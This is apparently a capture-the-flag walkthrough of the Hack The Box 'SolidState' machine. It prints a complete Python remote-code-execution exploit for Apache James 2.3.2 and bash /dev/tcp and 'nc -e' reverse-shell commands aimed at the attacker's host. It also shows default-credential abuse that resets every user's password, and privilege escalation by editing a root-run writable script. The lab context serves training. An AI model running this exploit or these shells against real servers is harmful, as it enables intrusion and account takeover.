Machine IP - 10.10.10.51
Starting with the nmap scan, the immediate result is as follows -
root@kali:~/Desktop/Hack The Box/solid state# nmap -F 10.10.10.51
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 18:36 +04
Nmap scan report for 10.10.10.51
Host is up (0.23s latency).
Not shown: 95 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds
The full port scan reveals this -
root@kali:~/Desktop/Hack The Box/solid state# nmap -sC -sV -p- -T5 10.10.10.51
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 18:36 +04
Warning: 10.10.10.51 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.51
Host is up (0.23s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.68 [10.10.14.68]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 545.12 seconds
The full port scan reveals that the server mainly runs a James Server, which is an Apache mail server. Therefore, searching for the james server exploit with the version as detected by nmap, we see an RCE -
root@kali:~/Desktop/Hack The Box/solid state# searchsploit james
------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Apache James Server 2.2 - SMTP Denial of Service | exploits/multiple/dos/27915.pl
Apache James Server 2.3.2 - Remote Command Execution | exploits/linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow | exploits/windows/remote/944.c
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Thus ,we use the RCE exploit, which basically exploits a function which does not sanitize the username for email users. The program is supposed to make new directories for all users and store the data there. The exploit makes use of the default credentials for the james administrator portal to create the user, which is in fact the exploit string. This creates a bash_completion.d directory, which gets loaded automatically when a user logs on. The payload we use is put inside this directory, which gets loaded upon a user login and thus we can use that payload for the RCE. The code, with the modification to give a reverse shell is as follows -
import socket
import sys
import time
payload = 'bash -i >& /dev/tcp/10.10.14.68/10023 0>&1'
user = 'root'
pwd = 'root'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to James Remote Administration Tool..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to James SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,25))
s.send("ehlo team@team.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@team.pl>\r\n")
recv(s)
s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: team@team.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."
Now, we know that the exploit will only work if the james credentials are in fact the default credentials i.e., root:root. Therefore, we try this and find that the credentials are the default ones.
root@kali:~/Desktop/Hack The Box/solid state# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword james tanq
Password for james reset
setpassword thomas tanq
Password for thomas reset
setpassword mindy tanq
Password for mindy reset
setpassword mailadmin tanq
Password for mailadmin reset
quit
Bye
Connection closed by foreign host.
Upon connecting, we saw what all we could accomplish and thus changed all the passwords for the mail services of all users. Now, we can try to login to the POP3 server to check the emails. We can do this by interacting with the server using nc and the pop3 commands. This is tried for all the 4 users above, but only one user gave results which are useful -
root@kali:~/Desktop/Hack The Box/solid state# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS tanq
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
QUIT
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
From here, we successfully got the password for the ssh session of the user mindy. Using this to login, we get the following -
root@kali:~/Desktop/Hack The Box/solid state# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
GIBBERISH
mindy@solidstate:~$ ls
bin user.txt
mindy@solidstate:~$ cat user.txt
914d0a4ebc177889b5b89a23f556fd75
We get the user flag from here. The prompt isn't bash here but its rbash, which is restricted bash. It disallows use of '/' as well as restricts the use of sudo, cd, less, more, vi, nano, man, etc and all other methods of obtaining a bash shell directly. The only way a shell can be executed using bash is using a preloaded construct which will be executed when a user or in this case, mindy, logs in. Turning back to the RCE now, we execute the code after logging out of the shell and relogin while listening on netcat, to ultimately obtain a bash shell bypassed from a jail shell -
root@kali:~/Desktop/Hack The Box/solid state# python james_exploit.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
We start the nc listener, and also log into ssh whic does not give a prompt. The nc listener however has a shell and now we can use that for privilege escalation -
root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 10023
listening on [any] 10023 ...
10.10.10.51: inverse host lookup failed: Unknown host
connect to [10.10.14.68] from (UNKNOWN) [10.10.10.51] 47318
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..
cd ..
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd /
cd /
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /bin -writable -user root -type f 2>/dev/null
find /bin -writable -user root -type f 2>/dev/null
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /dev -writable -user root -type f 2>/dev/null
find /dev -writable -user root -type f 2>/dev/null
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /opt -writable -user root -type f 2>/dev/null
find /opt -writable -user root -type f 2>/dev/null
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ find /opt -writable -user root -type f 2>/dev/null
find /opt -writable -user root -type f 2>/dev/null
/opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ cat /opt/tmp.py
cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/*')
except:
sys.exit()
After referring and enumerating for linux privesc, we only find world-writable files to return something which can be useful. The command used for searching searches for files owned by root but are world writable. One such file was in the opt directory as listed above, tmp.py. This is owned by root so therefore might have the effective uid of root. We can try executing this by editing the script. Therefore, we obtain the persistent shell using the following -
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ python -c 'import pty; pty.spawn("/bin/bash");'
python -c 'import pty; pty.spawn("/bin/bash");'
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ^Z
[1]+ Stopped nc -lvp 10023
root@kali:~/Desktop/Hack The Box/solid state# stty raw -echo
root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 10023
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ export TERM=screen
Now, we edit the file to open a shell to us using nc -e /bin/bash 10.10.14.68 9999
as payload inside the os.system call. The file may be a regularly executing process but we can't check the crontab of root as we are an underprivileged user. Therefore, we can change the code and then observe if the file is executed or not. After waiting for a few minutes, we get the shell as follows -
root@kali:~/Desktop/Hack The Box/solid state# nc -lvp 9999
listening on [any] 9999 ...
10.10.10.51: inverse host lookup failed: Unknown host
connect to [10.10.14.68] from (UNKNOWN) [10.10.10.51] 43938
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
cat root.txt
b4c9723a28899b1c45db281d99cc87c9
Thus, we get the root flag as well.